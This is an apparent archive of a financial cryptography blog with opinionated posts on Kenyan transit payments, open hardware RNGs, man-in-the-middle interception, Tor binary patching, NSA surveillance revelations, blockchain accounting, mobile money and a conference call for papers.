The reason this is real news in the "new" sense is that indigenous solutions can work because they are tailored to the actual events and activities on the ground. In contrast, the western aid / poverty agenda typically doesn't work and does more harm than good, because it is an export of western models to countries that aren't aligned to those assumptions. Message to the west: Go away, we've got this ourselves.

Posted by iang at 08:18 AM | Comments (1)

January 20, 2015

Hitler v. modern western state of the art transit payment systems: Hitler 1, rich white boys 0.

As predicted in the first day we saw it (and published on this blog much later), mass transit payment systems are failing in Kenya:

Payment cards rolling back gains in Kenya's public transport sector

by Bedah Mengo NAIROBI (Xinhua) -- "Cash payment only", reads a sticker in a matatu plying the city center-Lavington route in Nairobi, Kenya. The vehicle belonging to a popular company was among the first to implement the cashless fare payment system that the Kenya government is rooting for.

And as it left the city center to the suburb on Monday, some passengers were ready to pay their fares using payment cards. However, the conductor announced that he would not accept cashless payments.

"Please pay in cash," he said. "We have stopped using the cashless system."

When one of the passengers complained, the conductor retorted as he pointed at the sticker pasted on the wall of the minibus. "This is not my vehicle, I only follow orders."

All passengers paid their fares in cash as those who had payment cards complained of having wasted money on the gadgets. The experience in the vehicle displays the fate of the cashless fare payment in the East African nation. The system is fast-fading from the country's transport barely a month after the government made frantic efforts to entrench it. ...

It's probably too late for them now, but I think there are ways to put such a system out through Kenya's mass transit. You just don't do it that way because the market will not accept it. Rejection was totally obvious, and not only because asymmetric payment mechanisms don't succeed if both sides have a choice:

The experience in the vehicle displays the fate of the cashless fare payment in the East African nation. The system is fast-fading from the country's transport barely a month after the government made frantic efforts to entrench it.

The Kenya government imposed a December 1, 2014 deadline as the time when all the vehicles in the nation should be using payment cards. A good number of matatu operators installed the system as banks and mobile phone companies launched cards to cash in on the fortune.

Commuters, on the other hand, bought the cards to avoid being inconvenienced. However, the little gains that were made in that period are eroding as matatu operators who had embraced the system go back to the cash.

"We were stopped from using the cashless system, because the management found it cumbersome. They said they were having cash-flow problems due to the bureaucracies involved in getting payments from the bank. None of our fleet now uses the system," explained the conductor.

A spot on various routes in the city indicated that there are virtually no vehicles using the cashless system.

"When it failed to take off on December 1 last year, many vehicles that had installed the system abandoned it. They have the gadgets, but they are not using them," said Manuel Mogaka, a matatu operator on the Umoja route.

As I pointed out the root issue they missed here was the incentives of, well, just about everyone on the bus!

If someone is serious about this, I can help, but I take the real cash, not fantasy plastic. I spent some time working the real issues in Kenya, and they have more latent potential waiting to be tapped than just about any country on the planet. Our designs were good, but that's because they were based on helping people with problems they wanted solved and were willing to work to solve.

The ditching of the payment cards means that the Kenya government has a herculean task in implementing the system.

"It is not only us who are uncomfortable with the system, even passengers. Mid December last year, some passengers disembarked from my vehicle when I insisted I was only taking cashless fare. I had to accept cash because passengers were not boarding," said Mogaka.

Not handwavy bureaucratic agendas like "stamp out corruption." Yes, you! Read this on corruption and not this:

Kenya's Cabinet Secretary for Transport and Infrastructure Joseph Kamau said despite the challenges, the system will be implemented fully. He noted that the government will only renew licences of the vehicles that have installed the system.

But matatu operators have faulted the directive, noting that it would be pointless to have the system when commuters do not have payment cards.

"Those cards can only work with people who have regular income and are able to budget a certain amount of money for fare every month. But if your income is irregular and low, it cannot work," said George Ogundi, casual laborer who stays in Kayole on the east of Nairobi.

Analysts note that the rush in implementing the system has made Kenya's public transport sector a "graveyard" where the cashless payment will be buried.

"The government should have first started with revamping the sector by coming up with a well-organized metropolitan buses like those found in developed world. People would have seen their benefits and embraced cashless fare payment," said Bernard Mwaso of Edell IT Solutions in Nairobi.

(Obviously, if the matatu owners don't install, government resistance will last about a day after the deadline.)

Posted by iang at 08:08 AM | Comments (0)

December 21, 2014

OneRNG -- open source design for your random numbers

Paul of Moonbase has put a plea onto kickstarter to fund a run of open RNGs. As we all know, having good random numbers is one of those devilishly tricky open problems in crypto. I'd encourage one and all to click and contribute.

For what it's worth, in my opinion, the issue of random numbers will remain devilish & perplexing until we seed hundreds of open designs across the universe and every hardware toy worth its salt also comes with its own open RNG, if only for the sheer embarrassment of not having done so before.

OneRNG is therefore massively welcome:

About this project

After Edward Snowden's recent revelations about how compromised our internet security has become some people have worried about whether the hardware we're using is compromised - is it? We honestly don't know, but like a lot of people we're worried about our privacy and security.

What we do know is that the NSA has corrupted some of the random number generators in the OpenSSL software we all use to access the internet, and has paid some large crypto vendors millions of dollars to make their software less secure. Some people say that they also intercept hardware during shipping to install spyware.

We believe it's time we took back ownership of the hardware we use day to day. This project is one small attempt to do that - OneRNG is an entropy generator, it makes long strings of random bits from two independent noise sources that can be used to seed your operating system's random number generator. This information is then used to create the secret keys you use when you access web sites, or use cryptography systems like SSH and PGP.

Openness is important, we're open sourcing our hardware design and our firmware, our board is even designed with a removable RF noise shield (a 'tin foil hat') so that you can check to make sure that the circuits that are inside are exactly the same as the circuits we build and sell. In order to make sure that our boards cannot be compromised during shipping we make sure that the internal firmware load is signed and cannot be spoofed.

OneRNG has already blasted through its ask of $10k. It's definitely still worth contributing more because it ensures a bigger run and helps much more attention on this project. As well, we signal to the world:

*we need good random numbers*

and we'll fight aka contribute to get them.

Posted by iang at 12:59 PM | Comments (2)

December 04, 2014

MITM watch - sitting in an English pub, get MITM'd

So, sitting in a pub idling till my 5pm, thought I'd do some quick check on my mail. Someone likes my post on yesterday's rare evidence of MITMs, posts a comment. Nice, I read all comments carefully to strip the spam, so, click click...

Boom, Firefox takes me through the wrestling trick known as MITM procedure. Once I've signalled my passivity to its immoral arrest of my innocent browsing down mainstreet, I'm staring at the charge sheet.

Whoops -- that's not financialcryptography.com's cert. I'm being MITM'd. For real!

Fully expecting an expiry or lost exception or etc, I'm shocked! I'm being MITM'd by the wireless here in the pub. Quick check on twitter.com who of course simply have to secure all the full tweetery against all enemies foreign and domestic and, same result. Tweets are being spied upon. The horror, the horror.

On reflection, the false positive result worked. One reason for that on the skeptical side is that, as I'm one of the 0.000001% of the planet that has wasted significant years on the business of protecting the planet against the MITM, otherwise known as the secure browsing model (queue in acronyms like CA, PKI, SSL here...), I know exactly what's going on.

How do I judge it all? I'm annoyed, disturbed, but still skeptical as to just how useful this system is. We always knew that it would pick up the false positive, that's how Mozilla designed their GUI -- overdoing their approach. As I intimated yesterday, the real problem is whether it works in the presence of a flood of false negatives -- claimed attacks that aren't really attacks, just normal errors and you should carry on.

Secondly, to ask: Why is a commercial process in a pub of all places taking the brazen step of MITMing innocent customers? My guess is that users don't care, don't notice, or their platforms are hiding the MITM from them. One assumes the pub knows why: the "free" service they are using is just raping their customers with a bit of secret datamining to sell and pillage.

Well, just another another data point in the war against the users' security.

Posted by iang at 09:49 AM | Comments (2)

December 03, 2014

MITM watch - patching binaries at Tor exit nodes

The real MITMs are so rare that protocols that are designed around them fall to the Bayesian impossibility syndrome (*). In short, false negatives cause the system to be ignored, and when the real negative indicator turns up it is treated as a false. Ignored. Fail.

Here's some evidence of that with Tor:

... I tested BDFProxy against a number of binaries and update processes, including Microsoft Windows Automatic updates. The good news is that if an entity is actively patching Windows PE files for Windows Update, the update verification process detects it, and you will receive error code 0x80200053.

.... If you Google the error code, the official Microsoft response is troublesome.

If you follow the three steps from the official MS answer, two of those steps result in downloading and executing a MS 'Fixit' solution executable. ... If an adversary is currently patching binaries as you download them, these 'Fixit' executables will also be patched. Since the user, not the automatic update process, is initiating these downloads, these files are not automatically verified before execution as with Windows Update. In addition, these files need administrative privileges to execute, and they will execute the payload that was patched into the binary during download with those elevated privileges.

And, tomorrow, another MITM!

(*) I'd love to hear a better name than Bayesian impossibility syndrome, which I just made up. It's pretty important, it explains why the current SSL/PKI/CA MITM protection can never work, relying on Bayesian statistics to explain why infrequent real attacks cannot be defended against when overshadowed by frequent false negatives.

Posted by iang at 09:40 AM | Comments (0)

October 12, 2014

In the Shadow of Central Banking

A recent IMF report on shadow banking places it at in excess of $70 trillion.

"Shadow banking can play a beneficial role as a complement to traditional banking by expanding access to credit or by supporting market liquidity, maturity transformation and risk sharing," the IMF said in the report. "It often, however, comes with bank-like risks, as seen during the 2007-08 global financial crisis."

It's a concern, say the bankers, it keeps the likes of Jamie Dimon up at night. But, what is it? What is this thing called shadow banking? For that, the IMF report has a nice graphic:

Aha! It's the new stuff: securitization, hedge funds, Chinese 'wealth management products' etc. So what we have here is a genie that is out of the bottle. As described at length, the invention of securitization allows a shift from banking to markets which is unstoppable.

In theoretical essence, markets are more efficient than middlemen, although you'd be hard pressed to call either the markets or banking 'efficient' from recent history.

Either way, this genie is laughing and dancing. The finance industry had its three wishes, and now we're paying the cost.

Posted by iang at 09:18 AM | Comments (1)

July 23, 2014

on trust, Trust, trusted, trustworthy and other words of power

Follows is the clearest exposition of the doublethink surrounding the word 'trust' that I've seen so far. This post by Jerry Leichter on Crypto list doesn't actually solve the definitional issue, but it does map out the minefield nicely. Trustworthy?

On Jul 20, 2014, at 1:16 PM, Miles Fidelman <...> wrote:
>> On 19/07/2014 20:26 pm, Dave Horsfall wrote:
>>>
>>> A trustworthy system is one that you *can* trust;
>>> a trusted system is one that you *have* to trust.
>>
> Well, if we change the words a little, the government
> world has always made the distinction between:
> - certification (tested), and,
> - accreditation (formally approved)

The words really are the problem. While "trustworthy" is pretty unambiguous, "trusted" is widely used to meant two different things: We've placed trust in it in the past (and continue to do so), for whatever reasons; or as a synonym for trustworthy. The ambiguity is present even in English, and grows from the inherent difficulty of knowing whether trust is properly placed: "He's a trusted friend" (i.e., he's trustworthy); "I was devastated when my trusted friend cheated me" (I guess he was never trustworthy to begin with).

In security lingo, we use "trusted system" as a noun phrase - one that was unlikely to arise in earlier discourse - with the *meaning* that the system is trustworthy.

Bruce Schneier has quoted a definition from some contact in the spook world: A trusted system (or, presumably, person) is one that can break your security. What's interesting about this definition is that it's like an operational definition in physics: It completely removes elements about belief and certification and motivation and focuses solely on capability. This is an essential aspect that we don't usually capture.

When normal English words fail to capture technical distinctions adequately, the typical response is to develop a technical vocabulary that *does* capture the distinctions. Sometimes the technical vocabulary simply re-purposes common existing English words; sometimes it either makes up its own words, or uses obscure real words - or perhaps words from a different language. The former leads to no end of problems for those who are not in the field - consider "work" or "energy" in physics. The latter causes those not in the field to believe those in it are being deliberately obscurantist. But for those actually in the field, once consensus is reached, either approach works fine.

The security field is one where precise definitions are *essential*. Often, the hardest part in developing some particular secure property is pinning down precisely what the property *is*! We haven't done that for the notions surrounding "trust", where, to summarize, we have at least three:

1. A property of a sub-system a containing system assumes as part of its design process ("trusted");
2. A property the sub-system *actually provides* ("trustworthy").
3. A property of a sub-system which, if not attained, causes actual security problems in the containing system (spook definition of "trusted").

As far as I can see, none of these imply any of the others. The distinction between 1 and 3 roughly parallels a distinction in software engineering between problems in the way code is written, and problems that can actually cause externally visible failures. BTW, the software engineering community hasn't quite settled on distinct technical words for these either - bugs versus faults versus errors versus latent faults versus whatever. To this day, careful papers will define these terms up front, since everyone uses them differently.

-- Jerry

Posted by iang at 05:05 AM | Comments (1) | TrackBack

June 20, 2014

Signalling and MayDay PAC

There's a fascinating signalling opportunity going on with US politics. As we all know, 99% the USA congress seats are paid for by contributions from corporate funders, through a mechanism called PACs or political action committees. Typically, the well-funded campaigns win the seats, and for that you need a big fat PAC with powerful corporate wallets behind.

Lawrence Lessig decided to do something about it.

"Yes, we want to spend big money to end the influence of big money... Ironic, I get it. But embrace the irony."

So, fighting fire with fire, he started the Mayday PAC:

"We’ve structured this as a series of matched-contingent goals. We’ve got to raise $1 million in 30 days; if we do, we’ll get that $1 million matched. Then we’ve got to raise $5 million in 30 days; if we do, we’ll get that $5 million matched as well. If both challenges are successful, then we’ll have the money we need to compete in 5 races in 2014. Based on those results, we’ll launch a (much much) bigger effort in 2016 — big enough to win."

They got to their first target, the 2nd of $5m will close in 30th June. Larry claims to have been inspired by Aaron Swartz:

“How are you ever going to address those problems so long as there’s this fundamental corruption in the way our government works?” Swartz had asked.

Something much at the core of the work I do in Africa.

The signalling opportunity is the ability to influence total PAC spending by claiming to balance it out. If MayDay PAC states something simple such as "we will outspend the biggest spend in USA congress today," then how do the backers for the #1 financed-candidate respond to the signal?

As the backers know that their money will be balanced out, it will no longer be efficacious to buy their decisions *with the #1 candidate*. They'll go elsewhere with their money, because to back their big man means to also attract the MayDay PAC.

Which will then leave the #2 paid seat in Congress at risk ... who will also commensurately lose funds. And so on ... A knock-on effect could rip the funding rug from many top campaigns, leveraging Lessig's measly $12m way beyond its apparent power.

A fascinating experiment.

The challenge of capturing people’s attention isn’t lost on Lessig. When asked if anyone has told him that his idea is ludicrous and unlikely to work, he answers with a smile: “Yeah, like everybody.”

Sorry, not this anybody. This will work. Economically speaking, signalling does work. Go Larry!

Posted by iang at 01:34 AM | Comments (0) | TrackBack

May 07, 2014

A triple-entry explanation for a minimum viable Blockchain

It's an article of faith that accounting is at the core of cryptocurrencies. Here's a nice story along those lines h/t to Graeme:

Ilya Grigorik provides a ground-up technologists' description of Bitcoin called "The Minimum Viable Blockchain." He starts at bartering, goes through triple-entry and the replacement of the intermediary with the blockchain, and then on to explain how all the perverse features strengthen the blockchain. It's interesting to see how others see the nexus between triple-entry and bitcoin, and I think it is going to be one of future historian's puzzles to figure out how it all relates.

Both Bob and Alice have known each other for a while, but to ensure that both live up to their promise (well, mostly Alice), they agree to get their transaction "notarized" by their friend Chuck.

They make three copies (one for each party) of the above transaction receipt indicating that Bob gave Alice a "Red stamp". Both Bob and Alice can use their receipts to keep account of their trade(s), and Chuck stores his copy as evidence of the transaction. Simple setup but also one with a number of great properties:

  1. Chuck can authenticate both Alice and Bob to ensure that a malicious party is not attempting to fake a transaction without their knowledge.
  2. The presence of the receipt in Chuck's books is proof of the transaction. If Alice claims the transaction never took place then Bob can go to Chuck and ask for his receipt to disprove Alice's claim.
  3. The absence of the receipt in Chuck's books is proof that the transaction never took place. Neither Alice nor Bob can fake a transaction. They may be able to fake their copy of the receipt and claim that the other party is lying, but once again, they can go to Chuck and check his books.
  4. Neither Alice nor Bob can tamper with an existing transaction. If either of them does, they can go to Chuck and verify their copies against the one stored in his books.

What we have above is an implementation of "triple-entry bookkeeping", which is simple to implement and offers good protection for both participants. Except, of course you've already spotted the weakness, right? We've placed a lot of trust in an intermediary. If Chuck decides to collude with either party, then the entire system falls apart.

Grigorik then uses public key cryptography to ensure that the receipt becomes evidence that is reliable for all parties; which is how I built it, and I'm pretty sure that was what was intended by Todd Boyle.

However he walks a different path and uses the signed receipts as a way to drop the intermediary and have Alice and Bob keep separate, independent ledgers. I'd say this is more a means to an end, as Grigorik is trying to explain Bitcoin, and the central tenant of that cryptocurrency was the famous elimination of a centralised intermediary.

Moral of the story? Be (very) careful about your choice of the intermediary!

I don't have time right now to get into the rest of the article, but so far it does seem like a very good engineer's description. Well worth a read to sort your head out when it comes to all the 'extra' bits in the blockchain form of cryptocurrencies.

Posted by iang at 03:09 AM | Comments (0) | TrackBack

April 18, 2014

Shots over the bow -- Haiti joins with USA to open up payments for the people

The separation of payments from banks is accelerating. News from Haiti:

The past year in Haiti has been marked by the slow pace of the earthquake recovery. But the poorest nation in the hemisphere is moving quickly on something else - setting up "mobile money" networks to allow cell phones to serve as debit cards.

The systems have the potential to allow Haitians to receive remittances from abroad, send cash to relatives across town or across the country, buy groceries and even pay for a bus ride all with a few taps of their cell phones.

Using phones to handle money payments is something we know works. It works so well that some 35% of the economy in Kenya moves this way (I forget the numbers). It works so well Kenya doesn't care about the banks freezing up the economy any more because they have an alternate system, they have resiliance in payments. It works so well that everyone can do mPesa, even the unbanked, which is most of them, bank accounts costing the same in Kenya as the west.

It works so well that mPesa has been the biggest driver to new bank accounts...

Yet mPesa hasn't been followed around the world. The reason is pretty simple -- regulatory interference. Central banks, I'm looking at you. In Kenya, the mission of "financial inclusion" won the day; in other countries around the world, central banks worked against wealth for the poorest by denying them payments on the mobile.

Is it that drastic? Yes. Were the central banks well-minded? Sure, they thought they were doing the right thing, but they were wrong. Mobile money equals wealth for the poor and there is no way around that fact. Stopping mobile money means taking money from the poor, in the big picture. Everything else is noise.

So when the poorest of the poor -- the Haitian earthquake victims were left in the mud, there were no banks left to serve them (sell them?) and the only way to get value out there turned out to be using the mobile phone.

That included, giving the users free mobile phones.

Can you see an important value point here? The value to society of getting mobile money to the poor is in excess of the price of the mobile phone.

Well, this only happens in poor countries, right? Wrong again. The financial costs that are placed on the poor of every country by the decisions of the central banks are common across all countries. Now comes Walmart, for that very express same reason:

In a move that threatens to upend another piece of the financial services industry, Walmart, the country’s largest retailer, announced on Thursday that it would allow customers to make store-to-store money transfers within the United States at cut-rate fees.

This latest offer, aimed largely at lower-income shoppers who often rely on places like check-cashing stores for simple transactions, represents another effort by the giant retailer to carve out a space in territory that once belonged exclusively to traditional banks.
...
Lower-income consumers have been a core demographic for Walmart, but in recent quarters those shoppers have turned increasingly to dollar stores.
...
More than 29 percent of households in the United States did not have a savings account in 2011, and about 10 percent of households did not have a checking account, according to a study sponsored by the Federal Deposit Insurance Corporation. And while alternative financial products give consumers access to services they might otherwise be denied, people who are shut out of the traditional banking system sometimes find themselves paying high fees for transactions as basic as cashing a check.

See the common thread with Bitcoin? Message to central banks: shut the people out, and they will eventually respond. The tide is now turning, and banks and central banks no longer have the credibility they once had to stomp on the poor. The question for the future is, which central banks will break ranks first, and align themselves with their countries and their peoples?

Posted by iang at 06:07 AM | Comments (0) | TrackBack

February 09, 2014

Digital Evidence journal is now open source!

Stephen Mason, the world's foremost expert on the topic, writes (edited for style):

The entire Digital Evidence and Electronic Signature Law Review is now available as open source for free here:

Current Issue         Archives

All of the articles are also available via university library electronic subscription services which require accounts:

EBSCO Host         HeinOnline         v|lex (has abstracts)

If you know of anybody that might have the knowledge to consider submitting an article to the journal, please feel free to let them know of the journal.

This is significant news for the professional financial cryptographer! For those who are interested in what all this means, this is the real stuff. Let me explain.

Back in the 1980s and 1990s, there was a little thing called the electronic signature, and its RSA cousin, the digital signature. Businesses, politicians, spooks and suppliers dreamed that they could inspire a world-wide culture of digitally signing your everything with a hand wave, with the added joy of non-repudiation.

They failed, and we thank our lucky stars for it. People do not want to sign away their life every time some little plastic card gets too close to a scammer, and thankfully humanity had the good sense to reject the massively complicated infrastructure that was built to enslave them.

However, a suitably huge legacy of that folly was the legislation around the world to regulate the use of electronic signatures -- something that Stephen Mason has catalogued here.

In contrast to the nuisance level of electronic signatures, in parallel, a separate development transpired which is far more significant. This was the increasing use of digital techniques to create trails of activity, which led to the rise of digital evidence, and its eventual domination in legal affairs.

Digital discovery is now the main act, and the implications have been huge if little understated outside legal circles, perhaps because of the persistent myth in technology circles that without digital signatures, evidence was worth less.

Every financial cryptographer needs to understand the implications of digital evidence, because without this wisdom, your designs are likely crap. They will fail when faced with real-world trials, in both senses of the word.

I can't write the short primer on digital evidence for you -- I'm not the world's expert, Stephen is! -- but I can /now/ point you to where to read.That's just one huge issue, hitherto locked away behind a hugely dominating paywall. Browse away at all 10 issues!

Posted by iang at 02:47 AM | Comments (0) | TrackBack

November 10, 2013

The NSA will shape the worldwide commercial cryptography market to make it more tractable to...

In the long running saga of the Snowden revelations, another fact is confirmed by ashkan soltani. It's the last point on this slide showing some nice redaction minimisation.

In words:

(U) The CCP expects this Project to accomplish the following in FY 2013:
  • ...
  • (TS//SI//NF) Shape the worldwide commercial cryptography marketplace to make it more tractable to advanced cryptanalytic capabilities being developed by NSA/CSS. [CCP_00090]

Confirmed: the NSA manipulates the commercial providers of cryptography to make it easier to crack their product. When I said, avoid American-influenced cryptography, I wasn't joking: the Consolidated Cryptologic Program (CCP) is consolidating access to your crypto.

Addition: John Young forwarded me the original documents (Guardian and NYT) and their blanket introduction makes it entirely clear:

(TS//SI//NF) The SIGINT Enabling Project actively engages the US and foreign IT industries to covertly influence and/or overtly leverage their commercial products' designs. These design changes make the systems in question exploitable through SIGINT collection (e.g., Endpoint, MidPoint, etc.) with foreknowledge of the modification. ....

Note also that the classification for the goal above differs in that it is NF -- No Foreigners -- whereas most of the other goals listed are REL TO USA, FVEY which means the goals can be shared with the Five Eyes Intelligence Community (USA, UK, Canada, Australia, New Zealand).

The more secret it is, the more clearly important is this goal. The only other goal with this level of secrecy was the one suggesting an actual target of sensitivity -- fair enough. More confirmation:

(U) Base resources in this project are used to:
  • (TS//SI//REL TO USA, FVEY) Insert vulnerabilities into commercial encryption systems, IT systems, networks and endpoint communications devices used by targets.
  • ...

and in goals 4, 5:

  • (TS//SI//REL TO USA, FVEY) Complete enabling for [XXXXXX] encryption chips used in Virtual Private Network and Web encryption devices. [CCP_00009].
  • (TS//SI//REL TO USA, FVEY) Make gains in enabling decryption and Computer Network Exploitation (CNE) access to fourth generation/Long Term Evolution (4GL/LTE) networks via enabling. [CCP_00009]

Obviously, we're interested in the [XXXXXX] above. But the big picture is complete: the NSA wants backdoor access to every chip used for encryption in VPNs, wireless routers and the cell network.

This is no small thing. There should be no doubt now that the NSA actively looks to seek backdoors in any interesting cryptographic tool. Therefore, the NSA is numbered amongst the threats, and so are your cryptographic providers, if they are within reach of the NSA.

Granted that other countries might behave the same way. But the NSA has the resources, the will, the market domination (consider Microsoft's CAPI, Java's Cryptography Engine, Cisco & Juniper on routing, FIPS effect on SSL, etc) and now the track record to make this a more serious threat.

Posted by iang at 06:48 AM | Comments (0) | TrackBack

November 01, 2013

NSA v. the geeks v. google -- a picture is worth a thousand cribs

Dave Cohen says: "I wonder if I have what it takes to make presentations at the NSA."

H/t to Jeroen. So I wonder if the Second World Cryptowars are really on?

Our Mission

To bring the world our unique end-to-end encrypted protocol and architecture that is the 'next-generation' of private and secure email. As founding partners of The Dark Mail Alliance, both Silent Circle and Lavabit will work to bring other members into the alliance, assist them in implementing the new protocol and jointly work to proliferate the worlds first end-to-end encrypted 'Email 3.0' throughout the world's email providers. Our goal is to open source the protocol and architecture and help others implement this new technology to address privacy concerns against surveillance and back door threats of any kind.

Could be. In the context of the new google sniffing revelations, it may now be clearer how the NSA is accessing all of the data of all of the majors. What do we think about the NSA? Some aren't happy, like Kenton Varda:

If the NSA is indeed tapping communications from Google's inter-datacenter links then they are almost certainly using the open source protobuf release (i.e. my code) to help interpret the data (since it's almost all in protobuf format). Fuck you, NSA.

What about google? Some outrage from the same source:

I had to admit I was shocked by one thing: I'm amazed Google is transmitting unencrypted data between datacenters.

is met with Varda's comment:

We're (I think) talking about Google-owned fiber between Google-owned endpoints, not shared with anyone, and definitely not the public internet. Physically tapping fiber without being detected is pretty difficult and a well-funded state-sponsored entity is probably the only one that could do it.

Ah. So google did some risk analysis and thought this was one they can pass on. Google's bad. A bit of research shows BlackHat in 2003:

  • Commercially available taps are readily available that produce an insertion loss of 3 dB which cost less than $1000!
  • Taps currently in use by state-sponsored military and intelligence organizations have insertion losses as low as 0.5 dB!
  • That document indicates 2001 published accounts of NSA tapping fibre, and I found somewhere a hint that it was first publically revealed in 1999. I'm pretty sure we knew about the USS Jimmy Carter back then, although my memory fades...

    So maybe Google thought it hard to tap fibre, but actually we've known for over a decade that is not so. Google's bad, they are indeed negligent. Jeroen van Gelderen says:

    Correct me if I'm wrong but you promise that "[w]e restrict access to personal information to Google employees, contractors and agents who need to know that information in order to process it for us, and who are subject to strict contractual confidentiality obligations and may be disciplined or terminated if they fail to meet these obligations.

    Indeed, as a matter of degree, I would say google are grossly negligent: the care that they show for physical security at their data centers, and all the care that they purport in other security matters, was clearly not shown once the fiber left their house.

    Meanwhile, given the nature of the NSA's operations, some might ask (as Jeroen does):

    Now that you have been caught being utterly negligent in protecting customer data, to the point of blatantly violating your own privacy policies, can you please tell us which of your senior security people were responsible for downplaying the risk of your thousands of miles of unsecured, easily accessible fibers being tapped? Have they been fired yet?

    Chances of that one being answered are pretty slim. I can imagine Facebook being pretty relaxed about this. I can sort of see Apple dropping the ball on this. I'm not going to spare any time with Microsoft, who've been on the contract teet since time immemorial.

    But google? That had security street cred? Time to call a spade a spade: if google are not analysing and revealing how they came to miss these known and easy threats, then how do we know they aren't conspirators?

    Posted by iang at 01:34 PM | Comments (1) | TrackBack

    July 30, 2013

    The NSA is lying again -- how STOOPID are we?

    In the on-going tits-for-tat between the White House and the world (Western cyberwarriors versus Chinese cyberspies; Obama and will-he-won't he scramble his forces to intercept a 29 year old hacker who is-flying-isn't-flying; the ongoing search for the undeniable Iranian cassus belli, the secret cells in Apple and Google that are too secret to be found but no longer secret enough to be denied), and one does wonder...

    Who can we believe on anything? Here's a data point. This must be the loudest YOU-ARE-STOOPID response I have ever seen from a government agency to its own populace:

    The National Security Agency lacks the technology to conduct a keyword search of its employees’ emails, even as it collects data on every U.S. phone call and monitors online communications of suspected terrorists, according to NSA’s freedom of information officer.

    “There’s no central method to search an email at this time with the way our records are set up, unfortunately,” Cindy Blacker told a reporter at the nonprofit news website ProPublica.

    Ms. Blacker said the agency’s email system is “a little antiquated and archaic,” the website reported Tuesday.

    One word: counterintelligence. The NSA is a spy agency. It has a department that is mandated to look at all its people for deviation from the cause. I don't know what it's called, but more than likely there are actually several departments with this brief. And they can definately read your email. In bulk, in minutiae, and in ways we civilians can't even conceive.

    It is standard practice at most large organizations — not to mention a standard feature of most commercially available email systems — to be able to do bulk searches of employees’ email as part of internal investigations, discovery in legal cases or compliance exercises.

    The claim that the NSA cannot look at its own email system is either a) a declaration of materially aiding the enemy by not completing its necessary and understood role of counterintelligence (in which case it should be tried in a military court, being wartime, right?), or b) a downright lie to a stupid public.

    I'm inclined to think it's the second (which leaves a fascinating panopoly of civilian charges). In which case, one wonders just how STOOPID the people governing the NSA are? Here's another data point:

    The numbers tell the story — in votes and dollars. On Wednesday, the House voted 217 to 205 not to rein in the NSA’s phone-spying dragnet. It turns out that those 217 “no” voters received twice as much campaign financing from the defense and intelligence industry as the 205 “yes” voters.

    .... House members who voted to continue the massive phone-call-metadata spy program, on average, raked in 122 percent more money from defense contractors than those who voted to dismantle it.

    .... Lawmakers who voted to continue the NSA dragnet-surveillance program averaged $41,635 from the pot, whereas House members who voted to repeal authority averaged $18,765.

    So one must revise ones opinion lightly in the face of overwhelming financial evidence: Members of Congress are financially savvy, anything but stupid.

    Which makes the voting public...

    Posted by iang at 10:02 AM | Comments (6) | TrackBack

    July 05, 2013

    FC2014 in Barbados 3-7 March

    Preliminary Call for Papers

    Financial Cryptography and Data Security 2014

    Eighteenth International Conference
    March 3–7, 2014
    Accra Beach Hotel & Spa
    Barbados

    Financial Cryptography and Data Security is a major international forum for research, advanced development, education, exploration, and debate regarding information assurance, with a specific focus on financial, economic and commercial transaction security. Original works focusing on securing commercial transactions and systems are solicited; fundamental as well as applied real-world deployments on all aspects surrounding commerce security are of interest. Submissions need not be exclusively concerned with cryptography. Systems security, economic or financial modeling, and, more generally, inter-disciplinary efforts are particularly encouraged.

    Topics of interests include, but are not limited to:

    Anonymity and Privacy
    Applications of Game Theory to Security
    Auctions and Audits
    Authentication and Identification
    Behavioral Aspects of Security and Privacy
    Biometrics
    Certification and Authorization
    Cloud Computing Security
    Commercial Cryptographic Applications
    Contactless Payment and Ticketing Systems
    Data Outsourcing Security
    Digital Rights Management
    Digital Cash and Payment Systems
    Economics of Security and Privacy
    Electronic Crime and Underground-Market Economics
    Electronic Commerce Security
    Fraud Detection
    Identity Theft
    Legal and Regulatory Issues
    Microfinance and Micropayments
    Mobile Devices and Applications Security and Privacy
    Phishing and Social Engineering
    Reputation Systems
    Risk Assessment and Management
    Secure Banking and Financial Web Services
    Smartcards, Secure Tokens and Secure Hardware
    Smart Grid Security and Privacy
    Social Networks Security and Privacy
    Trust Management
    Usability and Security
    Virtual Goods and Virtual Economies
    Voting Systems
    Web Security

    Important Dates

    Workshop Proposal Submission July 31, 2013
    Workshop Proposal Notification August 20, 2013
    Paper Submission October 25, 2013, 23:59 UTC
    (19:59 EDT, 16:59 PDT) -- FIRM DEADLINE, NO EXTENSIONS WILL BE GRANTED
    Paper Notification December 15, 2013
    Final Papers January 31, 2014
    Poster and Panel Submission January 8, 2014
    Poster and Panel Notification January 15, 2014

    Conference March 3-7, 2014

    [ snip ... more at CFP ]

    Posted by iang at 01:09 AM | Comments (0) | TrackBack

    June 07, 2013

    PRISM Confirmed: major US providers grant direct, live access to the NSA and FBI

    In an extraordinary clean sweep of disclosure from the Washington Post and the Guardian:

    The National Security Agency and the FBI are tapping directly into the central servers of nine leading U.S. Internet companies, extracting audio and video chats, photographs, e-mails, documents, and connection logs that enable analysts to track foreign targets, according to a top-secret document obtained by The Washington Post.

    The process is by direct connection to the servers, and requires no intervention by the companies:

    Equally unusual is the way the NSA extracts what it wants, according to the document: “Collection directly from the servers of these U.S. Service Providers: Microsoft, Yahoo, Google, Facebook, PalTalk, AOL, Skype, YouTube, Apple.”

    ....
    Dropbox, the cloud storage and synchronization service, is described as “coming soon.”

    From outside direct access might appear unusual, but it is actually the best way as far as the NSA is concerned. Not only does it give them access at Level Zero, and probably better access than the company has itself, it also provides the victim supplier plausible deniability:

    “We do not provide any government organization with direct access to Facebook servers,” said Joe Sullivan, chief security officer for Facebook. ....

    “We have never heard of PRISM,” said Steve Dowling, a spokesman for Apple. “We do not provide any government agency with direct access to our servers, ..." ....

    “Google cares deeply about the security of our users’ data,” a company spokesman said. “We disclose user data to government in accordance with the law, and we review all such requests carefully. From time to time, people allege that we have created a government ‘back door’ into our systems, but Google does not have a ‘back door’ for the government to access private user data.”

    Microsoft also provided a statement: “.... If the government has a broader voluntary national security program to gather customer data we don’t participate in it.”

    Yahoo also issued a denial. “Yahoo! takes users’ privacy very seriously,” the company said in a statement. “We do not provide the government with direct access to our servers, systems, or network.”

    How is this apparent contradiction possible? It is generally done via secret arrangements not with the company, but with the employees. The company does not provide back-door access, but the people do. The trick is to place people with excellent tech skills and dual loyalties into strategic locations in the company. These 'assets' will then execute the work required in secret, and spare the company and most all of their workmates the embarrassment.

